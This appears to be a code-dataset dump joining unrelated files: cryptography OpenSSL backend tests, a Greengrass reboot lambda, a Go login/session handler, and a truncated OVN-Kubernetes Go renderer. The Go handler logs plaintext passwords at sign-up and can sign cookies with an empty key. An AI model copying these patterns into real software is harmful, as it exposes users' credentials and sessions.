def test_openssl_assert(self):
backend.openssl_assert(True)
with pytest.raises(InternalError):
backend.openssl_assert(False)
def test_consume_errors(self):
for i in range(10):
backend._lib.ERR_put_error(
backend._lib.ERR_LIB_EVP, 0, 0, b"test_openssl.py", -1
)
assert backend._lib.ERR_peek_error() != 0
errors = backend._consume_errors()
assert backend._lib.ERR_peek_error() == 0
assert len(errors) == 10
def test_ssl_ciphers_registered(self):
meth = backend._lib.SSLv23_method()
ctx = backend._lib.SSL_CTX_new(meth)
assert ctx != backend._ffi.NULL
backend._lib.SSL_CTX_free(ctx)
def test_evp_ciphers_registered(self):
cipher = backend._lib.EVP_get_cipherbyname(b"aes-256-cbc")
assert cipher != backend._ffi.NULL
def test_unknown_error_in_cipher_finalize(self):
cipher = Cipher(AES(b"\0" * 16), CBC(b"\0" * 16), backend=backend)
enc = cipher.encryptor()
enc.update(b"\0")
backend._lib.ERR_put_error(0, 0, 1, b"test_openssl.py", -1)
with pytest.raises(InternalError):
enc.finalize()
def test_large_key_size_on_new_openssl(self):
parameters = dsa.generate_parameters(2048, backend)
param_num = parameters.parameter_numbers()
assert param_num.p.bit_length() == 2048
parameters = dsa.generate_parameters(3072, backend)
param_num = parameters.parameter_numbers()
assert param_num.p.bit_length() == 3072
def test_int_to_bn(self):
value = (2 ** 4242) - 4242
bn = backend._int_to_bn(value)
assert bn != backend._ffi.NULL
bn = backend._ffi.gc(bn, backend._lib.BN_clear_free)
assert bn
assert backend._bn_to_int(bn) == value
def test_int_to_bn_inplace(self):
value = (2 ** 4242) - 4242
bn_ptr = backend._lib.BN_new()
assert bn_ptr != backend._ffi.NULL
bn_ptr = backend._ffi.gc(bn_ptr, backend._lib.BN_free)
bn = backend._int_to_bn(value, bn_ptr)
assert bn == bn_ptr
assert backend._bn_to_int(bn_ptr) == value
def test_bn_to_int(self):
bn = backend._int_to_bn(0)
assert backend._bn_to_int(bn) == 0
@pytest.mark.skipif(
not backend._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE,
reason="Requires OpenSSL with ENGINE support and OpenSSL < 1.1.1d",
)
@pytest.mark.skip_fips(reason="osrandom engine disabled for FIPS")
class TestOpenSSLRandomEngine(object):
def setup(self):
# The default RAND engine is global and shared between
# tests. We make sure that the default engine is osrandom
# before we start each test and restore the global state to
# that engine in teardown.
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._lib.Cryptography_osrandom_engine_name
def teardown(self):
# we need to reset state to being default. backend is a shared global
# for all these tests.
backend.activate_osrandom_engine()
current_default = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(current_default)
assert name == backend._lib.Cryptography_osrandom_engine_name
@pytest.mark.skipif(
sys.executable is None, reason="No Python interpreter available."
)
def test_osrandom_engine_is_default(self, tmpdir):
engine_printer = textwrap.dedent(
"""
import sys
from cryptography.hazmat.backends.openssl.backend import backend
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
sys.stdout.write(backend._ffi.string(name).decode('ascii'))
res = backend._lib.ENGINE_free(e)
assert res == 1
"""
)
engine_name = tmpdir.join("engine_name")
# If we're running tests via ``python setup.py test`` in a clean
# environment then all of our dependencies are going to be installed
# into either the current directory or the .eggs directory. However the
# subprocess won't know to activate these dependencies, so we'll get it
# to do so by passing our entire sys.path into the subprocess via the
# PYTHONPATH environment variable.
env = os.environ.copy()
env["PYTHONPATH"] = os.pathsep.join(sys.path)
with engine_name.open("w") as out:
subprocess.check_call(
[sys.executable, "-c", engine_printer],
env=env,
stdout=out,
stderr=subprocess.PIPE,
)
osrandom_engine_name = backend._ffi.string(
backend._lib.Cryptography_osrandom_engine_name
)
assert engine_name.read().encode("ascii") == osrandom_engine_name
def test_osrandom_sanity_check(self):
# This test serves as a check against catastrophic failure.
buf = backend._ffi.new("unsigned char[]", 500)
res = backend._lib.RAND_bytes(buf, 500)
assert res == 1
assert backend._ffi.buffer(buf)[:] != b"\x00" * 500
def test_activate_osrandom_no_default(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
def test_activate_builtin_random(self):
e = backend._lib.ENGINE_get_default_RAND()
assert e != backend._ffi.NULL
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_activate_builtin_random_already_active(self):
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
backend.activate_builtin_random()
e = backend._lib.ENGINE_get_default_RAND()
assert e == backend._ffi.NULL
def test_osrandom_engine_implementation(self):
name = backend.osrandom_engine_implementation()
assert name in [
"/dev/urandom",
"CryptGenRandom",
"getentropy",
"getrandom",
]
if sys.platform.startswith("linux"):
assert name in ["getrandom", "/dev/urandom"]
if sys.platform == "darwin":
assert name in ["getentropy", "/dev/urandom"]
if sys.platform == "win32":
assert name == "CryptGenRandom"
def test_activate_osrandom_already_default(self):
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
backend.activate_osrandom_engine()
e = backend._lib.ENGINE_get_default_RAND()
name = backend._lib.ENGINE_get_name(e)
assert name == backend._lib.Cryptography_osrandom_engine_name
res = backend._lib.ENGINE_free(e)
assert res == 1
@pytest.mark.skipif(
backend._lib.CRYPTOGRAPHY_NEEDS_OSRANDOM_ENGINE,
reason="Requires OpenSSL without ENGINE support or OpenSSL >=1.1.1d",
)
class TestOpenSSLNoEngine(object):
def test_no_engine_support(self):
assert (
backend._ffi.string(backend._lib.Cryptography_osrandom_engine_id)
== b"no-engine-support"
)
assert (
backend._ffi.string(backend._lib.Cryptography_osrandom_engine_name)
== b"osrandom_engine disabled"
)
def test_activate_builtin_random_does_nothing(self):
backend.activate_builtin_random()
def test_activate_osrandom_does_nothing(self):
backend.activate_osrandom_engine()
class TestOpenSSLRSA(object):
def test_generate_rsa_parameters_supported(self):
assert backend.generate_rsa_parameters_supported(1, 1024) is False
assert backend.generate_rsa_parameters_supported(4, 1024) is False
assert backend.generate_rsa_parameters_supported(3, 1024) is True
assert backend.generate_rsa_parameters_supported(3, 511) is False
def test_generate_bad_public_exponent(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=1, key_size=2048)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(public_exponent=4, key_size=2048)
def test_cant_generate_insecure_tiny_key(self):
with pytest.raises(ValueError):
backend.generate_rsa_private_key(
public_exponent=65537, key_size=511
)
with pytest.raises(ValueError):
backend.generate_rsa_private_key(
public_exponent=65537, key_size=256
)
def test_rsa_padding_unsupported_pss_mgf1_hash(self):
assert (
backend.rsa_padding_supported(
padding.PSS(
mgf=padding.MGF1(DummyHashAlgorithm()), salt_length=0
)
)
is False
)
def test_rsa_padding_unsupported(self):
assert backend.rsa_padding_supported(DummyAsymmetricPadding()) is False
def test_rsa_padding_supported_pkcs1v15(self):
assert backend.rsa_padding_supported(padding.PKCS1v15()) is True
def test_rsa_padding_supported_pss(self):
assert (
backend.rsa_padding_supported(
padding.PSS(mgf=padding.MGF1(hashes.SHA1()), salt_length=0)
)
is True
)
def test_rsa_padding_supported_oaep(self):
assert (
backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA1(),
label=None,
),
)
is True
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 0,
reason="Requires OpenSSL with rsa_oaep_md (1.0.2+)",
)
def test_rsa_padding_supported_oaep_sha2_combinations(self):
hashalgs = [
hashes.SHA1(),
hashes.SHA224(),
hashes.SHA256(),
hashes.SHA384(),
hashes.SHA512(),
]
for mgf1alg, oaepalg in itertools.product(hashalgs, hashalgs):
assert (
backend.rsa_padding_supported(
padding.OAEP(
mgf=padding.MGF1(algorithm=mgf1alg),
algorithm=oaepalg,
label=None,
),
)
is True
)
def test_rsa_padding_unsupported_mgf(self):
assert (
backend.rsa_padding_supported(
padding.OAEP(
mgf=DummyMGF(), algorithm=hashes.SHA1(), label=None
),
)
is False
)
assert (
backend.rsa_padding_supported(
padding.PSS(mgf=DummyMGF(), salt_length=0)
)
is False
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)",
)
def test_unsupported_mgf1_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA256()),
algorithm=hashes.SHA1(),
label=None,
),
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_RSA_OAEP_MD == 1,
reason="Requires OpenSSL without rsa_oaep_md (< 1.0.2)",
)
def test_unsupported_oaep_hash_algorithm_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.SHA1()),
algorithm=hashes.SHA256(),
label=None,
),
)
def test_unsupported_mgf1_hash_algorithm_md5_decrypt(self):
private_key = RSA_KEY_512.private_key(backend)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_PADDING):
private_key.decrypt(
b"0" * 64,
padding.OAEP(
mgf=padding.MGF1(algorithm=hashes.MD5()),
algorithm=hashes.MD5(),
label=None,
),
)
class TestOpenSSLCMAC(object):
def test_unsupported_cipher(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_CIPHER):
backend.create_cmac_ctx(DummyCipherAlgorithm())
class TestOpenSSLSignX509Certificate(object):
def test_requires_certificate_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_certificate(
object(), private_key, DummyHashAlgorithm()
)
class TestOpenSSLSignX509CSR(object):
def test_requires_csr_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_csr(
object(), private_key, DummyHashAlgorithm()
)
class TestOpenSSLSignX509CertificateRevocationList(object):
def test_invalid_builder(self):
private_key = RSA_KEY_2048.private_key(backend)
with pytest.raises(TypeError):
backend.create_x509_crl(object(), private_key, hashes.SHA256())
class TestOpenSSLCreateRevokedCertificate(object):
def test_invalid_builder(self):
with pytest.raises(TypeError):
backend.create_x509_revoked_certificate(object())
class TestOpenSSLSerializationWithOpenSSL(object):
def test_pem_password_cb(self):
userdata = backend._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *")
pw = b"abcdefg"
password = backend._ffi.new("char []", pw)
userdata.password = password
userdata.length = len(pw)
buflen = 10
buf = backend._ffi.new("char []", buflen)
res = backend._lib.Cryptography_pem_password_cb(
buf, buflen, 0, userdata
)
assert res == len(pw)
assert userdata.called == 1
assert backend._ffi.buffer(buf, len(pw))[:] == pw
assert userdata.maxsize == buflen
assert userdata.error == 0
def test_pem_password_cb_no_password(self):
userdata = backend._ffi.new("CRYPTOGRAPHY_PASSWORD_DATA *")
buflen = 10
buf = backend._ffi.new("char []", buflen)
res = backend._lib.Cryptography_pem_password_cb(
buf, buflen, 0, userdata
)
assert res == 0
assert userdata.error == -1
def test_unsupported_evp_pkey_type(self):
key = backend._create_evp_pkey_gc()
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_private_key(key)
with raises_unsupported_algorithm(None):
backend._evp_pkey_to_public_key(key)
def test_very_long_pem_serialization_password(self):
password = b"x" * 1024
with pytest.raises(ValueError):
load_vectors_from_file(
os.path.join(
"asymmetric",
"Traditional_OpenSSL_Serialization",
"key1.pem",
),
lambda pemfile: (
backend.load_pem_private_key(
pemfile.read().encode(), password
)
),
)
class TestOpenSSLEllipticCurve(object):
def test_sn_to_elliptic_curve_not_supported(self):
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_ELLIPTIC_CURVE):
_sn_to_elliptic_curve(backend, b"fake")
@pytest.mark.requires_backend_interface(interface=RSABackend)
class TestRSAPEMSerialization(object):
def test_password_length_limit(self):
password = b"x" * 1024
key = RSA_KEY_2048.private_key(backend)
with pytest.raises(ValueError):
key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
serialization.BestAvailableEncryption(password),
)
class TestGOSTCertificate(object):
def test_numeric_string_x509_name_entry(self):
cert = _load_cert(
os.path.join("x509", "e-trust.ru.der"),
x509.load_der_x509_certificate,
backend,
)
if backend._lib.CRYPTOGRAPHY_IS_LIBRESSL:
with pytest.raises(ValueError) as exc:
cert.subject
# We assert on the message in this case because if the certificate
# fails to load it will also raise a ValueError and this test could
# erroneously pass.
assert str(exc.value) == "Unsupported ASN1 string type. Type: 18"
else:
assert (
cert.subject.get_attributes_for_oid(
x509.ObjectIdentifier("1.2.643.3.131.1.1")
)[0].value
== "007710474375"
)
@pytest.mark.skipif(
backend._lib.Cryptography_HAS_EVP_PKEY_DHX == 1,
reason="Requires OpenSSL without EVP_PKEY_DHX (< 1.0.2)",
)
@pytest.mark.requires_backend_interface(interface=DHBackend)
class TestOpenSSLDHSerialization(object):
@pytest.mark.parametrize(
"vector",
load_vectors_from_file(
os.path.join("asymmetric", "DH", "RFC5114.txt"), load_nist_vectors
),
)
def test_dh_serialization_with_q_unsupported(self, backend, vector):
parameters = dh.DHParameterNumbers(
int(vector["p"], 16), int(vector["g"], 16), int(vector["q"], 16)
)
public = dh.DHPublicNumbers(int(vector["ystatcavs"], 16), parameters)
private = dh.DHPrivateNumbers(int(vector["xstatcavs"], 16), public)
private_key = private.private_key(backend)
public_key = private_key.public_key()
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_SERIALIZATION):
private_key.private_bytes(
serialization.Encoding.PEM,
serialization.PrivateFormat.PKCS8,
serialization.NoEncryption(),
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_SERIALIZATION):
public_key.public_bytes(
serialization.Encoding.PEM,
serialization.PublicFormat.SubjectPublicKeyInfo,
)
with raises_unsupported_algorithm(_Reasons.UNSUPPORTED_SERIALIZATION):
parameters.parameters(backend).parameter_bytes(
serialization.Encoding.PEM, serialization.ParameterFormat.PKCS3
)
@pytest.mark.parametrize(
("key_path", "loader_func"),
[
(
os.path.join("asymmetric", "DH", "dhkey_rfc5114_2.pem"),
serialization.load_pem_private_key,
),
(
os.path.join("asymmetric", "DH", "dhkey_rfc5114_2.der"),
serialization.load_der_private_key,
),
],
)
def test_private_load_dhx_unsupported(
self, key_path, loader_func, backend
):
key_bytes = load_vectors_from_file(
key_path, lambda pemfile: pemfile.read(), mode="rb"
)
with pytest.raises(ValueError):
loader_func(key_bytes, None, backend)
@pytest.mark.parametrize(
("key_path", "loader_func"),
[
(
os.path.join("asymmetric", "DH", "dhpub_rfc5114_2.pem"),
serialization.load_pem_public_key,
),
(
os.path.join("asymmetric", "DH", "dhpub_rfc5114_2.der"),
serialization.load_der_public_key,
),
],
)
def test_public_load_dhx_unsupported(self, key_path, loader_func, backend):
key_bytes = load_vectors_from_file(
key_path, lambda pemfile: pemfile.read(), mode="rb"
)
with pytest.raises(ValueError):
loader_func(key_bytes, backend)
| [] | [] | [] | [] | [] | python | 0 | 0 | |
aws/lambdas/util/Reboot.py | #-------------------------------------------------------------------------------
# Name: Reboot.py
# Purpose: Reboot the device when a message is received
#-------------------------------------------------------------------------------
import greengrasssdk
import logging
import os
import igsdk.device
node_id = os.getenv('AWS_IOT_THING_NAME') or 'NO_THING_NAME'
#
# This handler receives all incoming messages (based on the topic subscription
# that was specified in the deployment). Only reboot when a message is
# received on this topic:
#
# device/<node_id>/reboot
#
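# Illustrative only (not part of the original module): any payload published
# to the topic above triggers the reboot. Assuming a thing named "my-node",
# one way to exercise the handler is the AWS CLI:
#
#   aws iot-data publish --topic "device/my-node/reboot" --payload '{}'
#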
def function_handler(event, context):
# Determine the topic
if context.client_context.custom and context.client_context.custom['subject']:
topic_el = context.client_context.custom['subject'].split('/')
if len(topic_el) == 3 and topic_el[0] == 'device' and topic_el[1] == node_id and topic_el[2] == 'reboot':
logging.info('Rebooting!')
igsdk.device.reboot(dev)
# Set up logging
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
# Create a greengrass core sdk client
client = greengrasssdk.client('iot-data')
# Initialize the IGSDK device module
logging.info('Starting Reboot function.')
dev = igsdk.device.device_init()
| [] | [] | [
"AWS_IOT_THING_NAME"
] | [] | ["AWS_IOT_THING_NAME"] | python | 1 | 0 | |
views/sessionViews.go | package views
import (
"log"
"net/http"
"os"
"github.com/gorilla/context"
"github.com/gorilla/sessions"
"github.com/pbillerot/graduel/db"
)
// CodeSecure as
var CodeSecure = []byte(os.Getenv("SESSION_KEY"))
// Store as
var Store = sessions.NewCookieStore(CodeSecure)
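// Note (illustrative, not from the original source): SESSION_KEY must be set
// in the environment before this package initializes, e.g.
//
//	export SESSION_KEY="<random 32- or 64-byte secret>"
//
// If it is unset, CodeSecure is empty and the cookie store signs sessions
// with an empty key.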
//RequiresLogin is a middleware which will be used for each httpHandler to check if there is any active session
func RequiresLogin(handler func(w http.ResponseWriter, r *http.Request)) func(w http.ResponseWriter, r *http.Request) {
return func(w http.ResponseWriter, r *http.Request) {
session, _ := Store.Get(r, "session")
if session.Values["loggedin"] != true {
http.Redirect(w, r, "/login", 302)
return
}
handler(w, r)
}
}
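// Example usage (illustrative; dashboardHandler is a hypothetical handler):
//
//	http.HandleFunc("/dashboard", RequiresLogin(dashboardHandler))
//
// Unauthenticated requests are redirected to /login before the wrapped
// handler runs.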
//LogoutFunc Implements the logout functionality. WIll delete the session information from the cookie store
func LogoutFunc(w http.ResponseWriter, r *http.Request) {
session, err := Store.Get(r, "session")
if err == nil { //If there is no error, then remove session
if session.Values["loggedin"] != false {
session.Values["loggedin"] = false
session.Save(r, w)
}
}
GraduelAddContext(r)
http.Redirect(w, r, "/login", 302) //redirect to login irrespective of error or not
}
//LoginFunc implements the login functionality, will add a cookie to the cookie store for managing authentication
func LoginFunc(w http.ResponseWriter, r *http.Request) {
switch r.Method {
case "GET":
log.Println("LoginFunc context", context.GetAll(r))
GraduelAddContext(r)
loginTemplate.Execute(w, context.GetAll(r))
case "POST":
log.Print("Inside POST")
r.ParseForm()
username := r.Form.Get("username")
password := r.Form.Get("password")
if (username != "" && password != "") && db.ValidUser(username, password) {
session, _ := Store.Get(r, "session")
session.Values["loggedin"] = true
session.Values["username"] = username
session.Save(r, w)
log.Print("user ", username, " is authenticated")
GraduelAddContext(r)
http.Redirect(w, r, "/", 302)
return
}
log.Print("Invalid user " + username)
loginTemplate.Execute(w, context.GetAll(r))
default:
http.Redirect(w, r, "/login", 302) // other methods fall back to the login page
}
}
//SignUpFunc will enable new users to sign up to our service
func SignUpFunc(w http.ResponseWriter, r *http.Request) {
if r.Method != "POST" {
http.Redirect(w, r, "/", http.StatusBadRequest)
return
}
r.ParseForm()
username := r.Form.Get("username")
password := r.Form.Get("password")
email := r.Form.Get("email")
log.Println(username, password, email)
err := db.CreateUser(username, password, email)
if err != nil {
http.Error(w, "Unable to sign user up", http.StatusInternalServerError)
} else {
GraduelAddContext(r)
http.Redirect(w, r, "/login", 302)
}
}
| [
"\"SESSION_KEY\""
] | [] | [
"SESSION_KEY"
] | [] | ["SESSION_KEY"] | go | 1 | 0 | |
pkg/network/ovn_kubernetes.go | package network
import (
"context"
"fmt"
"log"
"math"
"net"
"net/url"
"os"
"path/filepath"
"reflect"
"sort"
"strconv"
"strings"
"time"
yaml "github.com/ghodss/yaml"
configv1 "github.com/openshift/api/config/v1"
operv1 "github.com/openshift/api/operator/v1"
routev1 "github.com/openshift/api/route/v1"
"github.com/openshift/cluster-network-operator/pkg/bootstrap"
"github.com/openshift/cluster-network-operator/pkg/client"
cnoclient "github.com/openshift/cluster-network-operator/pkg/client"
"github.com/openshift/cluster-network-operator/pkg/names"
"github.com/openshift/cluster-network-operator/pkg/render"
"github.com/openshift/cluster-network-operator/pkg/util/k8s"
hyperv1 "github.com/openshift/hypershift/api/v1alpha1"
"github.com/pkg/errors"
appsv1 "k8s.io/api/apps/v1"
corev1 "k8s.io/api/core/v1"
apierrors "k8s.io/apimachinery/pkg/api/errors"
metav1 "k8s.io/apimachinery/pkg/apis/meta/v1"
uns "k8s.io/apimachinery/pkg/apis/meta/v1/unstructured"
"k8s.io/apimachinery/pkg/runtime"
"k8s.io/apimachinery/pkg/runtime/schema"
types "k8s.io/apimachinery/pkg/types"
"k8s.io/apimachinery/pkg/util/wait"
"k8s.io/klog/v2"
utilnet "k8s.io/utils/net"
crclient "sigs.k8s.io/controller-runtime/pkg/client"
)
const OVN_NB_PORT = "9641"
const OVN_SB_PORT = "9642"
const OVN_NB_RAFT_PORT = "9643"
const OVN_SB_RAFT_PORT = "9644"
const CLUSTER_CONFIG_NAME = "cluster-config-v1"
const CLUSTER_CONFIG_NAMESPACE = "kube-system"
const OVN_CERT_CN = "ovn"
const OVN_MASTER_DISCOVERY_POLL = 5
const OVN_MASTER_DISCOVERY_BACKOFF = 120
const OVN_LOCAL_GW_MODE = "local"
const OVN_SHARED_GW_MODE = "shared"
const OVN_LOG_PATTERN_CONSOLE = "%D{%Y-%m-%dT%H:%M:%S.###Z}|%05N|%c%T|%p|%m"
const OVN_NODE_MODE_FULL = "full"
const OVN_NODE_MODE_DPU_HOST = "dpu-host"
const OVN_NODE_MODE_DPU = "dpu"
const OVN_NODE_SELECTOR_DPU = "network.operator.openshift.io/dpu: ''"
var OVN_MASTER_DISCOVERY_TIMEOUT = 250
const (
// TODO: get this from the route Status
OVN_SB_DB_ROUTE_PORT = "443"
OVN_SB_DB_ROUTE_LOCAL_PORT = "9645"
OVSFlowsConfigMapName = "ovs-flows-config"
OVSFlowsConfigNamespace = names.APPLIED_NAMESPACE
)
// renderOVNKubernetes returns the manifests for the ovn-kubernetes.
// This creates
// - the openshift-ovn-kubernetes namespace
// - the ovn-config ConfigMap
// - the ovnkube-node daemonset
// - the ovnkube-master deployment
// and some other small things.
func renderOVNKubernetes(conf *operv1.NetworkSpec, bootstrapResult *bootstrap.BootstrapResult, manifestDir string) ([]*uns.Unstructured, bool, error) {
var progressing bool
// TODO: Fix operator behavior when running in a cluster with an externalized control plane.
// For now, return an error since we don't have any master nodes to run the ovn-master daemonset.
if bootstrapResult.Infra.ExternalControlPlane && !bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Enabled {
return nil, progressing, fmt.Errorf("Unable to render OVN in a cluster with an external control plane")
}
c := conf.DefaultNetwork.OVNKubernetesConfig
objs := []*uns.Unstructured{}
apiServer := bootstrapResult.Infra.APIServers[bootstrap.APIServerDefault]
localAPIServer := bootstrapResult.Infra.APIServers[bootstrap.APIServerDefaultLocal]
// render the manifests on disk
data := render.MakeRenderData()
data.Data["ReleaseVersion"] = os.Getenv("RELEASE_VERSION")
data.Data["OvnImage"] = os.Getenv("OVN_IMAGE")
data.Data["KubeRBACProxyImage"] = os.Getenv("KUBE_RBAC_PROXY_IMAGE")
data.Data["KUBERNETES_SERVICE_HOST"] = apiServer.Host
data.Data["KUBERNETES_SERVICE_PORT"] = apiServer.Port
data.Data["K8S_APISERVER"] = "https://" + net.JoinHostPort(apiServer.Host, apiServer.Port)
data.Data["K8S_LOCAL_APISERVER"] = "https://" + net.JoinHostPort(localAPIServer.Host, localAPIServer.Port)
data.Data["HTTP_PROXY"] = bootstrapResult.Infra.Proxy.HTTPProxy
data.Data["HTTPS_PROXY"] = bootstrapResult.Infra.Proxy.HTTPSProxy
data.Data["NO_PROXY"] = bootstrapResult.Infra.Proxy.NoProxy
data.Data["TokenMinterImage"] = os.Getenv("TOKEN_MINTER_IMAGE")
// TOKEN_AUDIENCE is used by token-minter to identify the audience for the service account token which is verified by the apiserver
data.Data["TokenAudience"] = os.Getenv("TOKEN_AUDIENCE")
data.Data["MTU"] = c.MTU
data.Data["RoutableMTU"] = nil
if conf.Migration != nil && conf.Migration.MTU != nil {
if *conf.Migration.MTU.Network.From > *conf.Migration.MTU.Network.To {
data.Data["MTU"] = conf.Migration.MTU.Network.From
data.Data["RoutableMTU"] = conf.Migration.MTU.Network.To
} else {
data.Data["MTU"] = conf.Migration.MTU.Network.To
data.Data["RoutableMTU"] = conf.Migration.MTU.Network.From
}
// c.MTU is used to set the applied network configuration MTU
// MTU migration procedure:
// 1. User sets the MTU they want to migrate to
// 2. CNO sets the MTU as applied
// 3. User can then set the MTU as configured
c.MTU = conf.Migration.MTU.Network.To
}
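// Worked example (illustrative values, not from any real cluster config):
// with Migration.MTU.Network.From=1400 and Migration.MTU.Network.To=8900,
// the larger value (8900) is applied as MTU and the smaller one (1400) as
// RoutableMTU for the duration of the migration; c.MTU is set to 8900.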
data.Data["GenevePort"] = c.GenevePort
data.Data["CNIConfDir"] = pluginCNIConfDir(conf)
data.Data["CNIBinDir"] = CNIBinDir
data.Data["OVN_NODE_MODE"] = OVN_NODE_MODE_FULL
data.Data["OVN_NB_PORT"] = OVN_NB_PORT
data.Data["OVN_SB_PORT"] = OVN_SB_PORT
data.Data["OVN_NB_RAFT_PORT"] = OVN_NB_RAFT_PORT
data.Data["OVN_SB_RAFT_PORT"] = OVN_SB_RAFT_PORT
data.Data["OVN_NB_RAFT_ELECTION_TIMER"] = os.Getenv("OVN_NB_RAFT_ELECTION_TIMER")
data.Data["OVN_SB_RAFT_ELECTION_TIMER"] = os.Getenv("OVN_SB_RAFT_ELECTION_TIMER")
data.Data["OVN_CONTROLLER_INACTIVITY_PROBE"] = os.Getenv("OVN_CONTROLLER_INACTIVITY_PROBE")
controller_inactivity_probe := os.Getenv("OVN_CONTROLLER_INACTIVITY_PROBE")
if len(controller_inactivity_probe) == 0 {
controller_inactivity_probe = "180000"
klog.Infof("OVN_CONTROLLER_INACTIVITY_PROBE env var is not defined. Using: %s", controller_inactivity_probe)
}
data.Data["OVN_CONTROLLER_INACTIVITY_PROBE"] = controller_inactivity_probe
nb_inactivity_probe := os.Getenv("OVN_NB_INACTIVITY_PROBE")
if len(nb_inactivity_probe) == 0 {
nb_inactivity_probe = "60000"
klog.Infof("OVN_NB_INACTIVITY_PROBE env var is not defined. Using: %s", nb_inactivity_probe)
}
// Hypershift
data.Data["ManagementClusterName"] = client.ManagementClusterName
data.Data["HostedClusterNamespace"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.Namespace
data.Data["OvnkubeMasterReplicas"] = len(bootstrapResult.OVN.MasterAddresses)
data.Data["ClusterID"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.ClusterID
data.Data["ClusterIDLabel"] = ClusterIDLabel
data.Data["OVNDbServiceType"] = corev1.ServiceTypeClusterIP
data.Data["OVNSbDbRouteHost"] = nil
data.Data["OVN_SB_NODE_PORT"] = nil
data.Data["OVN_NB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_PORT)
data.Data["OVN_SB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, OVN_SB_DB_ROUTE_PORT)
pubStrategy := bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.ServicePublishingStrategy
if pubStrategy != nil && pubStrategy.Type == hyperv1.Route {
if pubStrategy.Route != nil && pubStrategy.Route.Hostname != "" {
data.Data["OVNSbDbRouteHost"] = pubStrategy.Route.Hostname
}
} else if pubStrategy != nil && pubStrategy.Type == hyperv1.NodePort {
data.Data["OVNDbServiceType"] = corev1.ServiceTypeNodePort
data.Data["OVN_SB_NODE_PORT"] = bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort
data.Data["OVN_NB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%d", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort)
data.Data["OVN_SB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%d", bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteHost, bootstrapResult.OVN.OVNKubernetesConfig.HyperShiftConfig.OVNSbDbRouteNodePort)
}
// Hypershift proxy
if bootstrapResult.Infra.Proxy.HTTPProxy == "" {
data.Data["ENABLE_OVN_NODE_PROXY"] = false
} else {
data.Data["ENABLE_OVN_NODE_PROXY"] = true
u, err := url.Parse(bootstrapResult.Infra.Proxy.HTTPProxy)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to parse http proxy")
}
host, port, err := net.SplitHostPort(u.Host)
if err != nil {
return nil, progressing, errors.Wrap(err, "failed to split http proxy host")
}
data.Data["HTTP_PROXY_IP"] = host
data.Data["HTTP_PROXY_PORT"] = port
data.Data["OVN_SB_DB_ROUTE_LOCAL_PORT"] = OVN_SB_DB_ROUTE_LOCAL_PORT
data.Data["OVN_NB_DB_ENDPOINT"] = fmt.Sprintf("ssl:%s:%s",
